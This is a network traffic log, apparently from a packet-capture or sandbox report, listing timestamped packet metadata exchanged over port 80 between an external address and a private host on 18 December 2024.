Dec 18, 2024 13:38:12.436706066 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.436817884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.437567949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.437618971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.437769890 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.437817097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.438623905 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.438662052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.438729048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.438776970 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.439726114 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.439765930 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.439907074 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.439946890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.440586090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.440628052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.440718889 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.440757036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.442348957 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.442390919 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.442508936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.442552090 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.442682981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.442704916 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.442728043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.442745924 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.443557978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.443603039 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.443727970 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.443783045 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.444655895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.444669008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.444700956 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.444717884 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.445646048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.445689917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.445815086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.445857048 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.446530104 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.446572065 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.446768045 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.446809053 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.447535992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.447587967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.447815895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.447863102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.448609114 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.448676109 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.448735952 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.448776007 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.449615955 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.449654102 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.449685097 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.449717999 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.450567961 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.450609922 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.450649023 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.450704098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.451683044 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.451730013 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.452030897 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.452079058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.452687025 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.452698946 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.452725887 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.452740908 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.453646898 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.453660011 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.453696012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.454503059 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.454545975 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.454699993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.454745054 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.455553055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.455601931 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.455660105 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.455702066 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.456551075 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.456593990 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.456629992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.456716061 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.457521915 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.457562923 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.457628965 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.457669973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.458564997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.458611965 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.458628893 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.458672047 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.459557056 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.459600925 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.459639072 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.459718943 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.460587978 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.460601091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.460635900 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.461549997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.461591005 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.461724043 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.461766958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.462594032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.462644100 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.462707996 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.462749958 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.463515997 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.463565111 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.463728905 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.463773012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.464574099 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.464617968 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.464659929 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.464703083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.465559006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.465601921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.465660095 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.465703964 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.466563940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.466610909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.466736078 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.466775894 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.467545033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.467590094 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.467736006 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.467778921 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.468568087 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.468615055 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.468822956 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.468868971 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.469647884 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.469686031 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.469690084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.469724894 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.470530033 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.470577002 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.470642090 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.470685005 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.471577883 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.471622944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.471690893 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.471765995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.472552061 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.472603083 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.472628117 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.472671986 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.473608017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.473654032 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.613722086 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.613786936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.613799095 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.613828897 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.613997936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.614047050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.614065886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.614108086 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.614706039 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.614753008 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.614913940 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.614952087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.615746975 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.615792036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.615827084 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.615873098 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.616772890 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.616789103 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.616822004 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.616839886 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.617707014 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.617758989 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.617789984 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.617827892 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.618849993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.618896961 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.618925095 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.618967056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.619678020 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.619723082 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.619766951 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.619811058 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.620743036 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.620800018 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.620837927 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.620879889 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.621748924 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.621794939 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.621834993 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.621877909 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.622700930 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.622747898 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.622941017 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.622997999 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.623729944 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.623776913 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.623893976 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.623938084 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.624764919 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.624816895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.624852896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.624891043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.626286030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.626341105 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.626460075 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.626502037 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.627185106 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.627198935 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.627230883 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.627255917 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.627928972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.627983093 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.628144026 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.628189087 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.628890991 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.628940105 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.629009008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.629053116 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.629690886 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.629741907 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.629858971 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.629978895 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.630769014 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.630784988 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.630817890 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.630835056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.631799936 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.631891966 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.631902933 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.631951094 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.632765055 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.632823944 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.632910013 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.632953882 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.633781910 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.633827925 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.633904934 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.633948088 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.634747982 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.634799957 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.634821892 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.634866953 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.635741949 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.635790110 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.635958910 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.636004925 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.636684895 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.636732101 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.636795998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.636841059 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.637850046 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.637902021 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.637979984 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.638030052 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.639091969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.639106035 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.639147043 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.639864922 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.639914036 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.639933109 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.639980078 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.640940905 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.640995979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.641031027 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.641079903 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.641789913 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.641839027 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.642076969 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.642122030 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.642760992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.642807007 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.642971992 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.643013000 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.643702030 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.643749952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.643848896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.643892050 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.644681931 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.644732952 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.644788980 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.644834042 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.645905972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.645953894 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.646017075 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.646055937 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.646995068 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.647010088 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.647049904 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.647058964 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.648000956 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.648051023 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.648113012 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.648161888 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.648955107 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.648982048 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.649004936 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.649023056 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.649719954 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.649785995 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.649825096 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.649872065 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.650742054 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.650815010 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.650954008 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.650996923 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.651737928 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.651787996 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.651808977 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.651853085 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.652678013 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.652721882 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.652765989 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.652810097 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.653719902 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.653768063 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.653824091 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.653872967 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.654733896 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.654781103 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.654827118 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.654870033 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.655719042 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.655769110 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.655972958 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.656013012 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.656774998 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.656790972 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.656826973 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.657722950 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.657784939 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.657891989 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.657934904 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.658772945 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.658802032 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.658822060 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.658837080 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.659735918 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.659780979 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.659828901 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.659874916 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.660737038 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.660784006 CET	49708	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:12.660835981 CET	80	49708	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:12.660900116 CET	49708	80	192.168.2.8	31.41.244.11
